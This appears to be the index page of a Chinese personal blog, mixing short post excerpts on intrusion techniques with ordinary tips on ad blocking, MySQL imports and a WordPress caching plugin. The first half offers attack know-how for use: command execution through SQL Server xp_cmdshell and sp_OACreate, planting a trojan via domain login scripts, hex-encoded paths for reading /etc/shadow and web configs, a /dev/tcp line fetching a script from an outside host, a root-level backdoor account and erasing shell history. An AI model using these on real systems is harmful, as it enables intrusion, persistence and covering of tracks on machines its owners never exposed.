Chinadu's Blog

利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单，只需使用下面的SQL语句：

EXEC master.dbo.xp_cmdshell 'dir c:\'

但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险，他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名，这时侯许多人也许会放弃，因为我们无法运行任何的cmd命令，很难查看对方计算机的文件、目录、开启的服务，也无法添加NT用户。

对此作过一番研究，后来我发现即使xp_cmdshell不可用了，还是有可能在服务器上运行CMD并得到回显结果的，这里要用到SQL服务器另外的几个系统存储过程：sp_OACreate，sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。
阅读全文...

渗透某内网时，得一内网SA，外网映射IP未知，开80端口，服务器不可外连，渴此机IIS配置信息，Google之，得方法，遂共享。

iiscnfg /export /f c:\chinadu.xml /sp / /children /inherited

但很多情况下如果在服务器直接执行的话，会报错cscript不是默认vbs解释器(iiscnfg是个VBS文件iiscnfg.vbs),所以我们应该用cscript加参数来运行:

cscript C:\WINDOWS\system32\iiscnfg.vbs /export /f c:\chinadu.xml /sp / /children /inherited

PS:开始/sp参数后面的路径老不对，后来发现用“/”根路径就可以了，信息还更全。
详细参数请Google。

PS:
标签有网站基本配置信息
标签有网站目录配置信息和其他配置信息
其它自己看

在我们渗透工作中，只要能入侵windows域中任意一台主机，就能通过一些猥琐技巧拿到域服务器管理员权限。但是有时要入侵一些域内用户终端，有 时我们只知道目标的用户名，但是无法判断他在哪台机器上面登录，若是通过bginfo记录登录事件的话，那也要需要很长时间，但还不一定我们的域控制器就 可以控制他，所以我们就可以利用用户登录脚本实现让这台机器中马。这样解决了用户可以访问域但是域控制器不可以管理用户登录机器的情况。

这里我说明一点，当域用户在本机属于power users组以下权限时，是无法运行exe的，我们根本无法判断用户在登录机器上的权限，所以我们只有认为用户是非系统管理员权限，利用lsrunas.exe工具来提取权限。

我们打开域的netlogon共享

阅读全文...

/etc/passwd 0x2F6574632F706173737764
/etc/shadow 0x2F6574632F736861646F77
/etc/issue 0x2F6574632F6973737565
/etc/fstab 0x2F6574632F6673746162
/etc/host.conf 0x2F6574632F686F73742E636F6E66
/etc/motd 0x2F6574632F6D6F7464
/etc/ld.so.conf 0x2F6574632F6C642E736F2E636F6E66
/etc/sysconfig/network-scripts/ifcfg-eth0 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746830
/etc/sysconfig/network-scripts/ifcfg-eth1 0x2F6574632F737973636F6E6669672F6E6574776F726B2D736372697074732F69666366672D65746831
/var/www/htdocs/index.php 0x2F7661722F7777772F6874646F63732F696E6465782E706870
/var/www/conf/httpd.conf 0x2F7661722F7777772F636F6E662F68747470642E636F6E66
/var/www/htdocs/index.html 0x2F7661722F7777772F6874646F63732F696E6465782E68746D6C
/var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69
/var/httpd/htdocs/index.php 0x2F7661722F68747470642F6874646F63732F696E6465782E706870
/var/httpd/conf/httpd.conf 0x2F7661722F68747470642F636F6E662F68747470642E636F6E66
/var/httpd/htdocs/index.html 0x2F7661722F68747470642F6874646F63732F696E6465782E68746D6C
/var/httpd/conf/php.ini 0x2F7661722F68747470642F636F6E662F7068702E696E69
/var/www/index.html 0x2F7661722F7777772F696E6465782E68746D6C
/var/www/index.php 0x2F7661722F7777772F696E6465782E706870
/opt/www/conf/httpd.conf 0x2F6F70742F7777772F636F6E662F68747470642E636F6E66
/opt/www/htdocs/index.php 0x2F6F70742F7777772F6874646F63732F696E6465782E706870
/opt/www/htdocs/index.html 0x2F6F70742F7777772F6874646F63732F696E6465782E68746D6C
/usr/local/apache/htdocs/index.html 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E68746D6C
/usr/local/apache/htdocs/index.php 0x2F7573722F6C6F63616C2F6170616368652F6874646F63732F696E6465782E706870
/usr/local/apache2/htdocs/index.html 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E68746D6C
/usr/local/apache2/htdocs/index.php 0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F696E6465782E706870
/usr/local/httpd2.2/htdocs/index.php 0x2F7573722F6C6F63616C2F6874747064322E322F6874646F63732F696E6465782E706870
/usr/local/httpd2.2/htdocs/index.html 0x2F7573722F6C6F63616C2F6874747064322E322F6874646F63732F696E6465782E68746D6C
/tmp/apache/htdocs/index.html 0x2F746D702F6170616368652F6874646F63732F696E6465782E68746D6C
/tmp/apache/htdocs/index.php 0x2F746D702F6170616368652F6874646F63732F696E6465782E706870
/etc/httpd/htdocs/index.php 0x2F6574632F68747470642F6874646F63732F696E6465782E706870
/etc/httpd/conf/httpd.conf 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
/etc/httpd/htdocs/index.html 0x2F6574632F68747470642F6874646F63732F696E6465782E68746D6C
/www/php/php.ini 0x2F7777772F7068702F7068702E696E69
/www/php4/php.ini 0x2F7777772F706870342F7068702E696E69
/www/php5/php.ini 0x2F7777772F706870352F7068702E696E69
/www/conf/httpd.conf 0x2F7777772F636F6E662F68747470642E636F6E66
/www/htdocs/index.php 0x2F7777772F6874646F63732F696E6465782E706870
/www/htdocs/index.html 0x2F7777772F6874646F63732F696E6465782E68746D6C
阅读全文...

1.无wget nc等下载工具时下载文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat< &5 > c.pl

2.Linux添加uid为0的用户
useradd -o -u 0 cnbird

3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null
阅读全文...

来源：Chinadu`s Blog

XP搞内网的时候，LCX.exe转发出来到本机的端口，在mstsc里面连127.0.0.1是联不上去的,因为XP是单用户。

阅读全文...

windows 2003中的远程桌面功能非常方便，但是初始设置只允许2个用户同时登陆。有些时候因为我在公司连接登陆后断开，同事在家里用其他用户登陆后断开，当我再进行连接的时候，总是报错“终端服务超过最大连接数”。这时候我和同事都不能登陆，有没有什么办法可以达到以下几个目的中的一个：

　　1. 为账号设定权限，管理员登陆的时候强制注销多余的用户。
　　2. 管理员登陆的时候自动接管在其他地方断开的状态（本来这个功能具备，但有些时候不行）。
　　3. 不安装总段服务的时候增加连接数（不是临时授权）

　　通过以下方法来增加连接数:
阅读全文...

1、打开千千静听的安装 目录，删除里面的"info"文件夹 (如果有的话)
2、新建一个文本文档，然后将其命名为"info"，注意不要保留任何扩展名，不要保留成 “info.txt”喔。
Windows默认情况下是隐藏了扩展名的，显示扩展名的方法：打开资源管理器>工具>文件夹选项> 查看>高级设置>去掉“不显示已经文件类型的扩展名”前面的勾确定即可.

这样就不会再弹出广告了，一切清静了。其实这个原理很 简单，就是让千千静听不能创建名为info的文件夹，那个文件夹的作用是保存弹出广告的。

现在越来越多的人在迅雷上看电影了。我也很喜欢，但是我很不喜欢迅雷看看上的15秒广告。当然，也有迅雷工具的广告也很麻烦。于是，我就在网络上搜罗了一翻，找到了一些迅雷屏蔽的技巧。
[修改时，请先将迅雷程序关闭！]

1. 去除迅雷看看15秒广告

在 C:WINDOWSsystem32driversetc 目录下，用记事本打开 hosts 文件。

复制内容到剪贴板 程序代码
找到
127.0.0.1 localhost
在之后加入
------ 屏蔽迅雷看看广告 ------
0.0.0.0 pubstat.sandai.net
0.0.0.0 mcfg.sandai.net
0.0.0.0 biz5.sandai.net
0.0.0.0 float.sandai.net
0.0.0.0 recommend.xunlei.com
0.0.0.0 cl.kankan.xunlei.com

2. 禁止迅雷偷偷上传
阅读全文...

今天为论坛进行服务器空间的转移~~~先顺利将Mysql数据库用phpmyadmin导出~~
然后在新服务器上建好数据库后，然后进行导入！可是因为MySQL数据库的.sql文件大于2MB。所以在导入时就提示说超过2048KB的错误，不让导入….于是就引出了此文的解决办法，呵呵

解决办法：
阅读全文...

安装了Wp Super Cache，导致wp-postviews不能正常统计文章浏览次数。
解决办法：
如果你不再用Wp Super Cache这个插件，请按以下方法将其卸除：
在后台禁用此插件。
删除/wp-content/plugins/目录的wp-super-cache目录。
删除wp-content目录下面的cache目录。

删除wp-content目录下面的wp-config.php ，advanced-cache.php两个文件。
修改wp-config.php，把下面一行删掉即可：

define(’WP_CACHE’, true);

想想似乎是在安装wp-super-cache后wp-postviews就不能工作了。虽然把wp-super-cache删出了，但任然不能工作。
经过测试后发现原来是在wp-super-cache安装时往wp-config.php文件中写入了一个定义语句：

define( 'WP_CACHE', true );

，删除后wp-postviews恢复正常。

WP Super Cache 基本介绍
WP Super Cache 是 WordPress 官方开发人员 Donncha 开发，是当前最高效也是最灵活的 WordPress 静态缓存插件。它直接生成 HTML 文件，这样 Apache 就不用解析 PHP 脚本，通过使用这个插件，能使得你的 WordPress 博客将显著的提速。

这个插件是基于 Ricardo Galli Granada 的 WP-Cache 2。WP-Cache 2 可以缓存你的 WordPress 博客使得不用再次访问数据库，但是它产生的是 PHP 文件而不是 HTML 文件，所以还需要 PHP 引擎去解析它们。而 WP Super Cache 则直接产生 HTML 文件，所以服务器不用解析甚至一行 PHP 代码，所以缓存之后的速度就和访问你服务器上的一张图片一样快。
WP Super Cache 是如何工作的

一半常规的缓存办法是手工把动态页面保存为 HTML 代码，WP Super Cache 也是通过同样的方式的，但是通过自动的方式完成这个过程。

当你一个访问者来的你的站点，他没有登入或者也没有留言，这样他得到是一个在 WordPress cache 文件夹下的 supercache 子文件夹下的纯静态文件，其实你都可以自己到上面的 supercache 目录下去查看同样的永久链接的 HTML 文件的备份。判断一个页面是否已经被缓存了，查看该页面的源代码，看看最后一行是否有 < !– super cache –> 或者 < !– super cache gz –>。

如果访问者已经登陆或者留了言，就会返回 WP Cache 函数生成的页面，并且最后一行会有 < !– Cached page served by WP-Cache — >
阅读全文...